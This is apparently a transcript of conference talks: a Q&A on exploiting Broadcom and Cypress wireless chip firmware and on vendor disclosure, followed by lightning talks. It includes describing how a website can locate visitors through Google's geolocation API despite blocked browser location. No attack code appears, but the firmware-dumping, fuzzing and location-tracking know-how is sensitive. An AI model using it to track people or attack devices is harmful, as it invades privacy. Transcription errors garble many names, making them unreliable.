thing, when you find stuff you need to respond to the disclosure, and so I said, Young was writing a lot of emails, and one of the first that he wrote was like two Thradix, because Thradix is the operating system that runs on the Bluetooth, Broadcom Bluetooth chip, and so he said like, your heap is a bit broken and does not have any checks, you could implement the following checks which are pretty cheap, and it should be cool, and then I could not attack it anymore, and then Thradix was answering, which was a bit unexpected, that they already knew about this exploitation technique, and that it is up to the application to not be vulnerable to memory correction, or not to cause any memory corruption, so it's the programmer's fault if they do something, and it's not the operating system that has to take care of the heap. Yeah, next issue, so the binder thing and the testing, if a vulnerability is still there, so you might not always get feedback from all the vendors, if they fixed it, they might just fix it at a certain point in time, and then you tell them, oh, we tested the next release, and it's still vulnerable, and then they would say, like for example, Samsung said, yeah, we cannot send you patches in advance without an NDA, because Broadcom, blah, blah, blah, and so on and so forth, and then Broadcom offered to send us patches in advance, and I said, yeah, nice, and I also sent them a device list, because they already knew it from the previous process, so if you tell them the following 10 devices have an issue, then they would already know that we can test those devices anyway, and after I sent them the list, they said, oh, wait, but you need an NDA, so no, I mean, we are doing this for free anyway, and then signing an NDA, I wouldn't do that. Yeah, so overall, also the Broadcom product security incident response team is a bit strange, so they wouldn't hand out any CVEs, and what I mean by that is, like, I first get a CVE, and then inform them and all their customers, because I also don't get any incident number or something, so if I wouldn't do this, I wouldn't have any number to refer a vulnerability to, and, well, at least they're also not doing that much legal trouble, but it's just, yeah, not really something happening there, but some of the customers were nice, at least to my students, so they paid, so one customer, they don't want to be named here, but they paid a flight to Defcon for one of my students, and Samsung gave a bounty of $1,000. I mean, still, I mean, we are in the range of way more expensive exploits if it would be on the black market, but for students, it's definitely nice. Yeah, responsibility disclosure timelines. So this is something that I thought, like, maybe some of this responsibility disclosure timeline is just because of how I communicate with the vendor, and sometimes I'm writing emails like a five-year-old or something, I don't know, but actually, so this is a timeline of Quark's lab who also found just this year vulnerabilities in Broadcom Wi-Fi chips, and so they were also asked about NDA, and then also their exploit timeline is a bit fun because they had similar exploitation strategies as in the very first exploits that you could see by Google Project Zero, and then, yeah, more disclosure timeline, whatever, and in the end, well... So it's just taking time and again, no CVE ID issued and so on and so forth, so it's the very same stuff for others, which is pretty sad. And then, so for Cypress, which is partially having source code of Broadcom and also manufacturer's chip, it's also very slow for the responsibility disclosure, and then I got told by other people, like, yeah, if you would disclose something to Qualcomm, it also takes very long, and, well, luckily, we didn't find something in an Intel CPU, but, yeah, there's... So on the wireless market, there's still so many other vendors to become friends with, so, yeah, well... So practical solutions to end my talk. What could you do to defend yourself if you don't have a tinfoil hat? Other things I can recommend is the secure Wi-Fi setup, so don't use antennas, just use antenna cables. We do that in our lab a lot, so this is a setup by Felix, and so when I was sending my slides to Francesco in advance, he just said, like, cool, I have the same one right now at my desktop, so it's a very common setup. Maybe not at your home, but for us, it is. Or you just go to the AirGap device, so this is my PowerBook 170. That's a really great device, almost impossible to get it online, and it has root and axle. So, ask all the questions. Thank you very much, Tiazka. We still have several minutes left. You will find eight microphones in the room. Please line up behind the microphones to ask a question, and the first question goes to the Internet. So, Helioska, the question is, are the Bluetooth issues you were talking about also present in Bluetooth low-energy IoT devices? Yes, so, I mean, there is IoT devices. I cannot tell the vendor, but there's also some popular devices that have, like, Cypress.com chips, and then it's even worse, because they don't have a separate stack, and often they have an application running on the same ARM core, and then you don't even need any escalation. All right, we have another question at the microphone, number one, please. Thank you for the talk. My question is, did you actually, when you fuzz the Bluetooth low-energy chip, when you managed to get code execution, did you actually climb up the protocol? Did you access Bluetooth profiles or something like this? Ah, so, for example, for the thing with the linky extraction, we were building some proof of concepts, but so it depends. So, we don't currently have, like, a full exploit chain in terms of first on the chip, and then on the host, we have something that goes directly on some host, but yeah, there's tons of things there to do. Sorry? Yeah, and when you fuzz the... How did you actually fuzz the chip itself? How did you extract the firmware from the chip? Ah, so there is... So, Broadcom and Cypress are very nice because they have a read RAM command, so you don't need any secure bypass or something, and for the evaluation kits, there is even symbols that we found in it. So, symbols only means, like, function names and global variable names. That's it, but that's something to work with. Thank you. Another question from the internet, please. Would you like the return of physical switches for the network controller? Yeah, so that would be nice to, like, physically switch it off. Actually, I don't know where Paul is, but he's building... Here, there's Paul. He's building such a device. Ah, when is your talk? At 10 o'clock, Paul is giving a talk about a device where you have a physical controller to switch off your wireless stuff. Okay, the next question is again, microphone number one, please. Yeah, thank you. We just bought a new car, and by... because connecting the Bluetooth of my phone to the car's system was very, very hard, and I had to reboot the radio several times, and then I found a message that the radio must be directly connected to the canvas of the car, so you have a Bluetooth stack connected directly to a canvas. It was a very cheap car, but if you have an idea what this means, then... Can you borrow me that car? It's a Toyota Igo. You can have it everywhere. Wow, that shouldn't be. All right, we have a question. Microphone number eight, please. Hi, thank you for your talk, first of all. Well, if I understood correctly, you said that the vendors didn't mention if they fixed it or not, or you don't know if they fixed it? Yeah, so it depends. So if you look into the Android security updates, so for example, August 5th has some Broadcom issue that was fixed, and I know which one that was, and so on and so forth, but so then it also means to get that one onto a Samsung device, I would need... So they wouldn't build it in the August update, but only in the September update, and then release it to Euro, which is mid or end of September, and then I could download it to my phone and test it over the air if it's really fixed and so on and so forth. So it's... There is... The first thing is that it's listed publicly that it is fixed, and then the next thing is that it is actually fixed, and it's really high, and for the communication with Apple, I don't know, so sometimes they fix it silently without mentioning us, and then there's this iOS 13 thing where they mentioned us but didn't fix it, so yeah. Were there any issues that you found, and you didn't know if they fixed it or not, and you did patch-diffing or something like that? Yeah, I did a lot of patch-diffing, and I currently have a student who is doing nothing else than developing diffing tools for the particular issues that I have. And did you find that they fixed it or not? Ah, so it's first of all... So first of all, it's currently about speed and stuff, and I gave him some iPhone stuff for the next task, but yeah, it's work in progress. So most of the other stuff I did by hand, so I also have a good idea about what changed within each kind of chip generation. Okay, thank you very much. All right, we had another question from the internet. Yes, so from Macedon, how exactly was the snapshot of the Samsung Bluetooth stack extracted for the fuzzing process? The Samsung is... So for Samsung, we have snapshotting, but for Samsung, we don't have the rest of Frankenstein. The other stuff is running on an evaluation board. So the first part is mapping all the hardware registers, so this is the first script that runs and tries to find all the memory regions, and once that is done, there is a snapshotting hook that you set to the function. So let's say you want to look into device scanning, so you would set a function into device scanning, and once that is called by the Linux stack, you would freeze the whole chip and disable, like, other interrupt stuff, whatever, that would kill it otherwise, and then copy everything that is in the registers. So that is kind of the snapshotting, and once you have a snapshot, then you can try to find everything that kills your emulation, like interrupts again and thread switches and so on. All right, we have one more question from microphone number one, please. Okay, so do you think that open source, the driver, or that open hardware design would improve the situation? So open source, I think it would improve the situation, but also one thing, so I had a talk at MRMCD in September this year, another thing which is not about open sources, that the patching capabilities of the Broadcom Bluetooth chips are very limited in terms of how much can be fixed, so just open sourcing wouldn't help Broadcom, for example. Like, you mean the firmware is burned into the chip and it's limited to... The patching is limited, right? Yeah, so it's in the ROM, and then you have Petram slots, and you have, like, 128 Petram slots, and each Petram slot is a four-byte overwrite breakpoint thingy that branches from somewhere else into RAM, and then RAM is also limited, so you couldn't branch into large chunks of RAM all the time. Yeah. Okay, thank you. All right, if there are not any more questions, Internet? Internet? Oh, more Internet questions, then please go ahead. Yes, so Winfreak on Twitter asks, what stack was tested when mentioning Android? There are several, and Google is convinced that revising it every year is a good idea. Ah, yeah, so the stuff that's like... The standard stack that runs on a Samsung phone, for example. So I think, like, for the main Android, there's only one... I know that there's, like, legacy stacks, but they switched to only one. Yeah. So, Signal Angel, do you have more for us? Yes. What is your hat made of? My hat, so it's, like, aluminium foil, and then there is the cyber thingy. So that's also important. Yeah. So, but as I said, it doesn't really help. It would more help to put the smartphone in a blender, for example. All right. Thank you very much for this awesome talk. Give a huge round of applause to Jesko. Thank you.
Wireless connectivity is an integral part of almost any modern device. These technologies include LTE, Wi-Fi, Bluetooth, and NFC. Attackers in wireless range can send arbitrary signals, which are then processed by the chips and operating systems of these devices. Wireless specifications and standards for those technologies are thousands of pages long, and thus pose a large attack surface. Wireless exploitation is enabled by the technologies any smartphone user uses everyday. Without wireless connectivity our devices are bricked. While we can be more careful to which devices and networks we establish connections to protect ourselves, we cannot disable all wireless chips all the time. Thus, security issues in wireless implementations affect all of us. Wireless chips run a firmware that decodes wireless signals and interprets frames. Any parsing error can lead to code execution within the chip. This is already sufficient to read data passing the chip in plaintext, even if it would be encrypted while transmitted over the air. We will provide a preview into a new tool that enables full-stack Bluetooth fuzzing by real-time firmware emulation, which helps to efficiently identify parsing errors in wireless firmware. Since this kind of bug is within the wireless chips' proprietary firmware, patching requires assistance of the manufacturer. Often, fixing this type of security issue takes multiple months, if done at all. We will tell about our own responsible disclosure experiences, which are both sad and funny. Another risk are drivers in the operating system, which perform a lot of operations on the data they receive from the wireless chip. Most drivers trust the input they get from a wireless chip too much, meaning that wireless exploitation within the chip can easily escalate into the driver. While escalating directly into the operating system is the commonly known option, it is also possible to escalate into other chips. This is a new attack type, which cannot be filtered by the operating system. For everyone who is also concerned during our talk, there will be fancy tin foil hats.
10.5446/53217 (DOI)
The first talk for today is MI Incognito. Hi, I'm Tanoi Bose. My Twitter is Tanoi Bose and this is a small project that I was doing on privacy and it's titled MI Incognito. You have a presenter? Yeah, that's right. All right. So a quick shout out for this project. There's one lightning talk given at Balcon by Brian. Do definitely check out Balcon booth that's behind this hall. It was a nice starting point for me to be interested over privacy on apps and also to a guy named Smith who basically spoon fed me the idea when I was stuck at a point. So the talk by Brian talked about how you could use Tinder and Tinder's APIs to basically do mapping and as well as polylateration to identify user's location. It was pretty interesting talk. You should definitely catch up with him if you want to know more about this. So when I was doing my privacy exercise, of course, a lot of times I started opening Google Maps and I kept checking how you could plot data over Google Maps and how you can actually figure out people's information of people via Google Map. One thing that always caught me is whenever I open Google Map and stayed there for about a few seconds, it automatically resolved my location, approximate location and you could see some coordinates being appended on Google Maps in itself, which was a bit confusing for me for which I approached Google and told them how are you storing my data and what is giving my coordinates away and Google replies with a definition of IP address for people who do not know what is an IP address. You can definitely look at this definition beautifully explained by Google and then I asked Google, hey, can you stop sharing my approximate IP address? And they were like, we are sorry, stop sharing my approximate location coordinates. Then they were like, okay, we are not sharing your approximate location address, we are just getting it from your IP address. Now location via IP address, this is my location where you can see the red mark is basically somewhere I stay, the block where I stay and of course I am from Emirates and I looked at my IP address and the IP address location of the ISP is somewhere about four blocks away from my home and this is generally for our entire city most of the times. However, in this case, Abu Dhabi, if you have a connection, you would find your location to be this point which is marked on the maps, which is significantly farther away from my location. Now of course, in Chrome, there is a setting called location services which was blocked for my website because all my tests via Chrome was done via my website over there or free hosted website over there and there is something called Google location services via which you can do API calls and you can identify your approximate location via the API services which generally you opt into block and the browser would not be able to identify your location anymore. So launching this API call via the browser, I got my approximate location to be somewhere close to the area. What was more interesting was when I found these things out, I was kind of curious about what is going on, I approached one guy called Smith and he was like, hey, why don't you look at Google's geolocate API and he definitely mentioned few websites using this and collecting information from users. So it was interesting, so I go on to the geolocation documentation and I find out that you need to supply it with your Wi-Fi or cell tower data and it will give you your location based on that and if you are not able to supply a Wi-Fi address or cell tower address, it gives you your location based on your IP address. This was interesting because it responds with the latitude, longitude and the accuracy of the location coordinates that has been provided. So of course, when this kind of an API exists, you can script out an easy XHR request, querying the Google API services and host it on any website and what you actually get is nothing but the location coordinates. Even when you have blocked your location, like you can see in the location services on the top that I have blocked it from the website's execution, you can get the coordinates on the website execution. So on the left side is basically the code that executed on the website that I have on my domain and on the right side is the plot for the coordinates. You can see the accuracy is also mentioned, that's around 1,400 meters, that's 1.4 kilometers, that's decently close, however, quite a wide range. You can see it's still away from my block. So yeah, when you, however, turn off your Google GPS spoofer and things like that since I am at modern date in Foylhatt Guy, you can geolocate yourself into your block so I don't allow Google or any services by spoofing my GPS and you can geolocate yourself into it as well as... I'm going to be sorry, five, four, three, two, one. Thank you. Next up is Lern OS. Good morning, Congress. My name is Simon. I'm located at the Send It Center podcasting assembly and I want to make a short pitch for systematic lifelong learning. Lern OS is a term, it's a verb, it's coming from Esperanto, the artificial language and it's the future tense of learning. So it means we will learn or I will learn and I will talk a little bit about how I think how we can hack our own lifelong learning system. The problem that I see is that in more and more knowledge domains, the half-life of knowledge gets shorter and shorter. It's not so much the fact if we talk about knowledge that you acquire at school, about history, things like that. But if you think about especially technology and IT knowledge, the half-life gets shorter and shorter, this means that we have to learn on an ongoing basis and also in a systematic way. Second problem that I see is that our education systems are not prepared at all for teaching us these lifelong learning mechanisms. When you think about school, we send our children to school, it's a very formal approach with a fixed curriculum and fixed teaching methods. We don't really teach them how to learn in a self-organized way. I think same counts for the higher education. In terms of the Bachelor and Master processes, we apply more and more methods that we have in elementary schools also in higher education. And I think it gets even worse if we have a look at the working environments where a lot of people think that when you start working, learning ends because learning was in school and now you have to work. And every day that we spend on learning and trying out new things, it's a waste of money and time. So the idea of this learner as learning hack, so to say, is to put four ingredients together which are well-known methods in the business domain, I think, and also in the IT domain which consists out of four methods. One is SCRUM, the Agile Project Management approach. So one idea is to have so-called LENOS or learning sprints of 30 weeks to give yourself a cadence for your learning process. Think of it like having school years or half years in university or in school where the education system or a teacher provides you with material and learning goals and a curriculum. If this formal education ends, then you have to do that on your own. So if you do four sprints a year with classical planning, like planning of the goals, a learning process and a retro at the end, you would do four learning sprints a year, for example. Of course, you can adapt it to your needs. In terms of goals, we tried to use a method called OKR. It was developed by or at Intel in the 80s, already made famous at the end of the 90s at Google. So it's sort of the strategic management system at Google where you try to manage the goals over the levels of the whole cooperation, the individual teams and the individuals. And you just set a moonshot objective, a very ambitious goal for one sprint and have three so-called key results that you can measure what you have at the end of the sprints. So for example, here at the Congress, we tried to develop a guide where you can learn how to podcast and use podcasting as a knowledge sharing tool over one sprint. To get the learning process managed, we used a very old self-organization method called Getting Things Done by David Allen, which kind of replaces the job of the teacher. You organize your learning tasks on your own, put your tasks in a can-band board. We also have working on pre-prepared boards that can use for the learning process to manage the to-dos. And of course, if you did something, we should share what we learned and what we did. And there we use an approach called Working Out Loud, defined as making you work observable. A lot of you, I think, do that by putting stuff on GitHub or publishing presentations like we do here, but also narrating your work, talk about your work, talk about lessons learned, what worked, what didn't work. That's where podcasts come in, for example, where you can talk about what worked and what did not. I put you in the presentation, More Food for Thought for all of the four approaches. There are a lot of sources, like the YouTube we do by Rick Clough from Google Ventures, for example, or the podcast with David Allen talking about Getting Things Done. And the idea in the end is that you learn lifelong from now onwards until the end of your life, so to say. The address is a project that lasts for six years. We are in the middle of it. So there are three years to go. If you want to, there are some addresses where you can join the community, also a Twitter account, no matter if you learn with Lano S or take another approach. I would like to motivate you to keep calm and learn on. Thanks. Thank you. Next up is SMS for you. Hey, good morning. I'm Felix and I want to bring SMS for you. I think it's a valid question. Why do we still need SMS in 2020? That is because not everybody wants to have a smartphone. We have certain services. Think about banks that use SMS for verification in terms of mobile time for verification. Sometimes only GSM is available. And so SMS is the only thing we can send. And at the end, with all the mess of messengers in gated communities, it is still the least common denominator for text messaging. Why not use an SMS in the phone? I think there are a lot of reasons. One is because you are progressive and you want to use other means of communication. Maybe you are traveling and in some countries you use a different SIM card and you would still like to be able to receive the messages. Or in my case, I don't want to carry a registered SIM card on my own and carry it with me and get into the whole tracking worldwide movement profiles and so on. The opposite use case is also valid. Maybe you only have a dumb phone and you are somewhere and you want to send a message to somebody who is not on your SMS network or you want to maybe use email or SMPP. So SMS for you to the rescue. It started as a little script. We are now two persons. This is actually a talk because I'm looking for more people that are interested in that and want maybe to jump on and use it. It's a gateway between short messages and other means of communication. Currently we are supporting email. Yes, it's a heck but it works. And XMPP which is like the more solid approach to it. You need basically a modem, GSM, LTE modem, whatever. You connect it to a Raspberry Pi or other computer and it would receive the SMS, send out an email to you, you can respond to this email, it would send out the SMS back and the same thing with XMPP. So no matter where you are, no matter whether you have the SIM card with you, you will receive still those kind of old messages. You can find it on GitLab. It's HGPL. So we are here on the free side of the nice things. Thank you and check it out. Thank you. Next up is Verif Pal. Let me just open it. There you go. Hello. I'm going to talk about this cool project called Verif Pal. So you guys use Signal, right? Use TLS, use WhatsApp. All of these things are called cryptographic protocols. Cryptographic protocols are the systems that are tasked with assuring certain security guarantees like confidentiality for the communications or authentication and so on. So people design these security protocols and they tend to be really complicated. For example, sophisticated relatively protocol like Signal has to ensure certain cryptographic properties like forward secrecy. It does this thing where it generates new encryption keys all the time between every message. Other protocols like ZDARTP have to have certain considerations because they are dealing with voice chat, like encrypted phone calls, et cetera. And so designing these protocols is really hard. And like for example, TLS went through many revisions like 1.1, 1.2, 1.3. And 1.3 was the very first revision of TLS that was designed while actually working together with people who were formally verifying the design of the protocol. So what does formal verification mean? Formal verification is basically you can basically prove certain things or get assurances about the security guarantees or protocols. Are they resistant to an active attacker? Do they really achieve their security guarantees? So generally speaking, formal verification is kind of an academic thing. And you can see people use maybe this at three theorem prover. There's interesting high assurance programming frameworks like F-STAR that allow you to write formally verified cryptographic primitives and recently protocols as well. There's also modeling frameworks like Proverif and Tamarin that allow you to illustrate a model of a protocol. Like for example, a model of Alice and Bob speaking over signal. And then you can ask questions like, OK, this is a model of signal. Can an active attacker decrypt Alice's first message to Bob? Can an active attacker impersonate Bob to Alice? And so you can sort of get a lot of interesting analysis based on the questions that you ask and the models that you make. Now many papers have been published on this and so on, but it's not really used a lot. So why is that? Well, it's because it's complicated. Unless you're a specialist in cryptography, it's unlikely that you will be able to really delve into how Tamarin and Proverif work. So I am working on VerifPal. And so VerifPal also allows you to model and analyze and reason about protocols, but it's really friendly. So it has an intuitive new language for easily describing what Alice and Bob are doing. It has a modeling framework and engine that avoids user error and is easier to use. It even has a user manual that comes with a manga about formal verification, and it's really nice. So please check it out. It can reason about advanced protocols, even though it's really easy to use. It has some advanced features as well. So try it out. You don't have to be a professional or a super extreme advanced person to try it out. Everyone can learn how these systems work and reason about them. We look at the instruction manual as well, the user manual. It's really friendly and accessible. I strongly recommend that you read it. VerifPal is free open source software. It's very new. I only released it a few months ago, and it's still under development, but it's really interesting to use. I hope it's free and open source software under the GPL version 3. So please check it out at verifpal.com. You can download it for Windows, Linux, and Mac OS today and try it out. Thank you very much. Thank you. Next up is Crazy Sequential Representations. Hello, everyone. Today I'm going to tell something about Crazy Sequential Representations, or CSR in short. So CSR are basically mathematical expressions in which all digits occur in order, and this can either be in decreasing order from 9 to 1 or in increasing order from 1 to 9. Ditches may be used as separate numbers, but digits may also be concatenated into larger numbers. And there are basically five operations that you are allowed to use, which are addition, subtraction, multiplication, division, and exponentiation. In addition, parentheses may be used, and finally, numbers may also be negated. In other words, numbers may be used in a positive form, but numbers may also be used in a negative form. On the internet, there's a large list which gives increasing CSR and decreasing CSR for all numbers from 0 up to 11,111. And for all these numbers, CSR has been found, except for the number 10,958. So I thought maybe I can identify this number myself by doing some kind of brute force search. So let's say we want to iterate over all crazy sequential representations, which have three operations in them. And first, we need to go over all the operations, which would look somewhat like this. Then in the next step, we need to go over the different ways numbers can be concatenated, and we need to do this for the increasing order, but we also need to do this for the decreasing order. After this, we need to go over the different parentheses, or at least the meaningful combination of parentheses, and finally, the different ways in which negations can be applied. And instead of doing this for CSR with just three operations, we actually need to do this for CSR with one operation in them, up to CSR with eight operations in them, because they have nine digits, eight operations in between. This gives us about 725 billion different expressions to be evaluated. However, there are quite some optimizations one can do. For example, in many cases, parentheses make no differences, so you can just skip them. And in many cases, negations tend to cancel each other out, so also need to evaluate these. So we already had our list from zero to 11,000, which was now extended to about 2 billion, which is the upper limit of the 32-bit signed integer. In the increasing series, we have found 931, we have found CSR for 930,000 integers, and in the decreasing series, we have found CSR for about 1.3 million different integers. However, for the number 10958, no CSR was found. Only CSR that approximates the value, some come really close, but none of these CSRs evaluate to the exact number or the exact integer, 10958. We have found many CSRs which have the same length, so all these equations evaluate to the same number and have the same length. For many numbers, we have found expressions without using specific operations. For example, CSR without using subtraction, without using division, without using exponentiation, or without using concatenation of numbers. And for many numbers, we have found expressions in which specific operations occur at specific indexes. I'd like to conclude with the fact that CSR are basically a proof of work, because if you have a list of numbers, it is really hard to get your CSR, but once you have them, it is really easy to confirm that they are correct CSR and evaluate to specific numbers. All this work is available online, and if you have any questions, please send me an email. Thank you. Next up is how to become an Estonian e-resident. So good morning, everybody. My name is Markus, normally working for a great lightning company, and today I want to share my experience to become an e-resident. Two questions to the audience. Who has been to Estonia before? There are some hands, maybe 10. And who is an e-resident already? Nobody. Great. Estonia is one of the Baltic countries in Northern Europe, has only 1.3 million inhabitants. It's quite fairly the size of the Netherlands, and I want to share with you why I think about e-residency and how to become an e-resident, what is the number and facts of e-resident, and at the end maybe how to sign digitally with this. So one question could be to escape from New Zealand, because Estonia is far ahead in the digital world, but the reason is to be part of the state of the art online community. So since 2000, Estonians have arrived to access internet, not the possibility, but the right to do it. Since 2002, they have digital ID cards. You heard from Switzerland that they are thinking about 20 years later to make this ID cards electronically, so they are far ahead. And Estonians can vote online since 2007, and the e-residency started in 2014. And with this, you can establish and manage an EU company online. And by the way, the text declaration is fairly simple and done in some minutes, so it's a quite good advantage. So number of facts, we have about 60,000 e-residents worldwide in 160 countries, and they build roughly 10,000 companies already, which put a revenue of 30 million euros to Estonia already now. So how to become an e-resident? First you have to apply online, leave your ID information, your address, and kind of motivation, which can be fairly simple. Next step is to pay 100 euros, so do it today or tomorrow because it will rise to 120 next year. And for a win-win situation, you can use the referral card of me in the bottom two. And then we can win both because it's possible to win a trip to Estonia. The third step is to identify yourself in the embassy. This is the one in Berlin for me, so you have to go there, pick up your card and show your identity, leave your fingerprints, and finally, receive your ID card in this MSC with your name, with your digital ID. So if you have this ID card in your hand, you get also a card reader. It's in this small envelope, and you can now install the card reader software, which of course works in every system you think, so they are far ahead, I told you. You plug in the card in your computer and attach your cards, so then you are able to authenticate yourself with a pin one. So a four-digit pin. And if you sign documents, you can use the pin two, which is five digits. And with this digit or with its authentication, you can sign documents for getting a domain in Estonia or to establish your company when you want to do. So is there anyone I have convinced to become an eResident now? Oh, one, two, yeah, three. That's good. Thanks. Mission completed. And for the rest, if you don't want to be an Estonian eResident, I have another idea. Visit Estonia. It's quite an interesting country. You can learn a lot. And the basic words you need are terre, aiter, negamist, and tervisax. So if you have further questions, feel free to ask me via Twitter, email, LinkedIn, or whatever you like, or later on in this conference here. Thank you for your attention. Thank you. Next up is the infrastructure village. Hello, everybody. I hope you're having a fantastic experience in the cause this year. And let me give you my briefing for an idea that I'm having for next year, and to have an assembly and infrastructure village. And let's see if there is interest for that. And if you're interested to help me run this assembly. So let me start it. Fifty years ago, hacking was practically requiring just a few buttons with the correct tones or some kind of basic electronics in order to start hacking into telephone systems. The years went ahead, and the computers what you really needed were just a few hours on a computer, and then we were going to have computers at home. And nowadays we can even have CPUs with like 64 cores and stuff like that. But actually, the reality is that we use a ton of cores in our day-to-day life, even not directly. Let's say graphics card have like even a couple thousand of cores, routers have a ton of ASIC and other very fast CPUs and processing units. So this is what gave me the idea to create this assembly about, well, whatever you can technically stack, even if this is Raspberry Pi's smart devices for whatever is on, bananas, why not, FPGAs, or even just old school X8664 computers. Aligning with the CCC spirit, all architectures are beautiful. It doesn't matter what. You can do a ton of crazy stuff no matter what. So what are the use cases? Who may be interested in something like that? Well, of course, self-hosting is one very easy example where you do not need clustering per se, but you just delegate different tasks to different systems. Of NSA-proofing can be something very inspiring as well and can create a nice forum around this topic. And of course, red teaming and blue teaming can be very into this kind of stuff. As an example, you can have some systems for ocean gathering and processing, scanning for vulnerabilities different systems, orchestrating your non-concessual clouds, malware or something like that, processing some rainbow tables, cloud in the middle, deploying honeypots, detecting intrusion, some dev secops for fancy business-oriented people. So if this is something that you're interested in, reach out to me. I'm going to have up this website, infrastructurevillage.com very soon. You can find me also on IRC on Hackint with the hand this up because there is my phone number for the Congress for a few more hours here. Thank you very much. Thank you. Next up is how to run a bad awareness campaign. Hello, my name is Christiane Kloos and I want to explain how a bad awareness campaign is led or carried out. First of all, what is awareness? Many of you may know it, it's mainly about security, knowledge and behavior of employees regarding the protection of information within an organization, that is, knowledge of the employees, how to behave and how to protect their information. Since the first step of social engineering is the first step, it is relatively important not only to take technical protection measures, but also to educate people. We want to turn the whole thing around and make a bad campaign, that is, our goals are to make the employees unhappy. Maybe they should also hate the IT directly, so that would be the rise. How, also, do we not want to learn anything from employees? Conversation tips. So how do we get the whole thing on? There are various ways to run an awareness campaign. I focus mainly on a fishing campaign here and the whole thing starts with the mindset of employees who are at risk. That is, if we don't have employees, they don't have any danger for the company, so it might be good to build up the whole thing so that we can leave employees if they are bad. We start with the fact that we don't announce the whole thing, that is, we surprise the employees, then they have no idea what happened. We are more successful and they don't like us. So the only one is successful. We start with what we fish, that is, we send all people the same email at the same time, then we can vote each other. That may not make us very successful, because they talk to each other and instead of falling into it, it becomes more difficult to find the weaker people. But they definitely don't learn anything because they are warned by certain emails. Then of course we can use our admin power, that is, we can simply use the internal mail server or start the perfect fishing campaign where the employees have no little chance to really recognize them. It just makes sense that they are the opinion that the IT wants to completely put in and works against them. Do you have the IT? Also, do you have no chance to recognize the whole thing, learn accordingly not how you could behave with a real attacker? We can personally become, that is, we can just, especially when we send emails from colleagues or something like that, regarding the life we live in, something like, I take it out, someone wants to buy my furniture, can have the nice side effect that some other people suddenly ask, hey, you take it out, what's going on, is something broken for you, does the employee in any case unhappy? It's not bad either. And we don't want to clarify about misdeeds, that is, if you do something wrong, then you should somehow land on a 404-sided line or something like that. Then you don't know that you did something wrong, you don't know how you can improve in the future, how you have an attack on a real attacker. Accordingly, the goal is also to learn nothing from the employee. Now we know how we drive a bad campaign. In theory, you can get rid of all these things, how you drive a good car. I have changed it a little bit. In the ideal case, if you really want to bring something to the people, go there and see the employees and the IT as a team. You want to work together on it, that your company becomes safer, announce the whole thing, wait a moment until you start. Until one of the employees forgets that you have something like that, that is, it does not fall into your statistics. But if you behave wrong, remember, there was an announcement, you want to do that with us, you want to help us protect the company and you are not in a hurry. Don't do mass fishing, but go fishing for beer. Real attackers, yes, they sometimes send an email to everyone who is exactly the same, but in the ideal case, they send each individual email to individual point of view and the like. Accordingly, you have higher chances to reach them every time, to catch them every time and everyone can learn or the people will stay in a constant state and do not vote so much. Then you should only take the skills of an attacker, because an attacker is first time, so before he has hit you technically, is very first time only capable of sending information from outside. Accordingly, it does not matter if you use your complete breathing power, because you can just do more than a real attacker can do that. But it is still enough in general, so the attacker does not say, I pull up and want to sell my furniture, but somehow a known attacker wants to sell his furniture or something like that. This makes your employees not sad or it feels like hopefully none of the selected offenders is sad about you. And accordingly, clear the behavior of the attacker, brings the people together how they behave correctly and at exactly that moment they behave wrong. Basically, there are also various offers that you can help or that you can engage in, which know what to do or should not. If you have any questions or want to contact me, go to Twitter and an email and then thank you for your attention. Thank you. So next up is the work quantum or the work quantum. Now the life quantum, I don't really work quantum. Are you here? Are you in the room? Who wants to give this talk? So no, it's actually okay. I think we have some people from the waiting list here, but we will just continue with the next talk now. And yeah, we'll see. I'll call him up eventually, maybe. Oh, actually that's the last talk before the break, right? Does anyone have a schedule? Okay, then where are the people from the waiting list? Are you here? Oh, nobody showed up. Okay. So then that's a bit sad because we have so much time now. No, he left actually. I saw him leave. All right, then yeah, we're going to have a break until 12.30 right now. It's a bit, actually I don't have the slides for the people who, which slides do you mean? Oh, yeah, he was here yesterday. But you can, yeah, yeah, it's a lot. No, I mean, I told the waiting list people to come here 15 minutes before the break and it's still not 15 minutes before the break. So I don't know, maybe we wait a little and whistle the jeopardy melody or something. There's someone. I don't know. You're the first one after the break. Okay. I mean, we can just take your talk and do it right now. All right. Then thank you. All right, then we will just continue with the first talk after the break because the break is important to align all the other talks in the other halls. Then let's go. Hi, everyone. My name is Julie Lotzko and I'm an artist and researcher who's focused on subversion and critical stances on the, or technological and media landscape. And in this, in this endeavor, I wrote a doctoral degree on the intersections between hacker culture, especially hacktivism and arts in terms of historical view and contemporary arts. And it's a little part of my upcoming book, this presentation. And it's really hard for me to dance it in such a short time. So please feel free to find me after this talk or after the lightning talk session in Komona. If you don't, then probably fish me out of the bubble bath. In order to examine the intersections between the historical avant-garde art, which includes all the isms from after the first World War, including data isms, realism, and so on, I looked at different definitions of hacking. This is very interesting. So I probably don't have to define hacking for you. In my research, I use a definition from Tim Jordan, whereas hacking produces new materialities that define new ways of interacting with technology. I also probably don't have to define what a zero-day or social engineering is. So I just move on to the second slide where I started to examine the similarities between the avant-garde art movements and hacker culture and especially hacktivism. And within the avant-garde, I mostly looked at data isms. And it's very apparent from the first moment that there's a lot of similarities in terms of border violation practices, manifestos which try to aim for a future utopia, a new composition between society, like a kind of aim to recompose societal factors. There's a kind of need for an existing canon in both of these paradigms to build on and to interfere with in a revolutionary way. And in order to better understand what is really going on in the similarities, I looked at some traditions to interpret avant-garde artworks and some traditions to interpret hacking gestures, and I tried to cross-breed them. So in the next slide, we see some avant-garde artworks contextualized by Jordan's hacking typology. You see Dusham's Lafontaine as a zero-day, whereas the zero-day exhibits the biggest amount of creativity and innovation that has never been done before, so it exploits yet unknown vulnerability, whereas every other ready-made after Lafontaine would be a zero plus one day as vulnerability is still present, but it already has a smaller amount of innovation and appreciation from the community. Digital engineering is really, really big in the avant-garde, especially when it comes to performance. There's a picture from the 1990 Zurich performance in the Sadeh Kaflayton. There was a reading, the L'Este-Locerung, where the idea was to provoke the audience into a chaotic mess which the data is happily achieved, and script-crities in terms of data is artwork recombination would be like commercially aimed reconstructions of data is artworks. You also see the motivational basis of hacking by Tim Jordan there, whereas most of the original and appreciated avant-garde artworks are more aiming for societal change, whereas, for instance, a t-shirt that you buy in a souvenir shop would be aimed at personal gain from who released it. Which might be a bit new for you is where I try to examine hacker culture in the context of the already available interpretational framework of avant-garde artworks. And Kodpanos has a really interesting book which looks at avant-garde artworks as processes instead of artworks in the classical object definition, like an object as this. He looks at the process. So in terms of this analysis, Kodpanos points out that the avant-garde artwork tries to deconstruct the work of art, and in order to understand it, we have to focus on the process, how it's made. We first do abstraction in 